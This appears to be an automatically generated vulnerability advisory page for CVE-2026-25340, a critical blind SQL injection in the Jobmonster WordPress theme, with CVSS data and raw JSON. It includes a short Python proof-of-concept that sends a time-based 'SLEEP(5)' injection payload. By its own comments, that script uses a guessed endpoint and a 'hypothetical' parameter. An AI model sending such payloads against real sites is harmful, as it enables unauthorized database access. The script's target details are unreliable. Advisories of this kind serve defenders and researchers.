Security Vulnerability Report
中文
CVE-2026-25340 CVSS 9.3 CRITICAL

CVE-2026-25340

Published: 2026-03-25 17:16:45
Last Modified: 2026-04-24 16:32:54

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in NooTheme Jobmonster noo-jobmonster allows Blind SQL Injection.This issue affects Jobmonster: from n/a through < 4.8.4.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

NooTheme Jobmonster < 4.8.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time # CVE-2026-25340 PoC Concept (Blind SQL Injection) # Target: NooTheme Jobmonster < 4.8.4 def check_sqli(url, param): # Payload for time-based blind injection # Adjust the parameter name based on the vulnerable endpoint injection = "1' AND SLEEP(5)-- -" # Example request structure (actual endpoint may vary) target_url = f"{url}?{param}={injection}" start_time = time.time() try: response = requests.get(target_url, timeout=10) end_time = time.time() # If response takes longer than 5 seconds (approx), vulnerability is confirmed if (end_time - start_time) >= 5: return "[+] Vulnerability Confirmed: Time-based SQL Injection detected." else: return "[-] Vulnerability not detected or response too fast." except requests.RequestException as e: return f"[!] Error occurred: {e}" if __name__ == "__main__": # Replace with actual target URL and parameter target = "http://example.com/wp-admin/admin-ajax.php" vulnerable_param = "job_id" # Hypothetical parameter print(check_sqli(target, vulnerable_param))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25340", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:44.663", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in NooTheme Jobmonster noo-jobmonster allows Blind SQL Injection.This issue affects Jobmonster: from n/a through < 4.8.4."}, {"lang": "es", "value": "Vulnerabilidad de Neutralización Incorrecta de Elementos Especiales utilizados en un Comando SQL ('Inyección SQL') en NooTheme Jobmonster noo-jobmonster permite Inyección SQL Ciega. Este problema afecta a Jobmonster: desde n/d hasta &lt; 4.8.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/noo-jobmonster/vulnerability/wordpress-jobmonster-theme-4-8-4-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}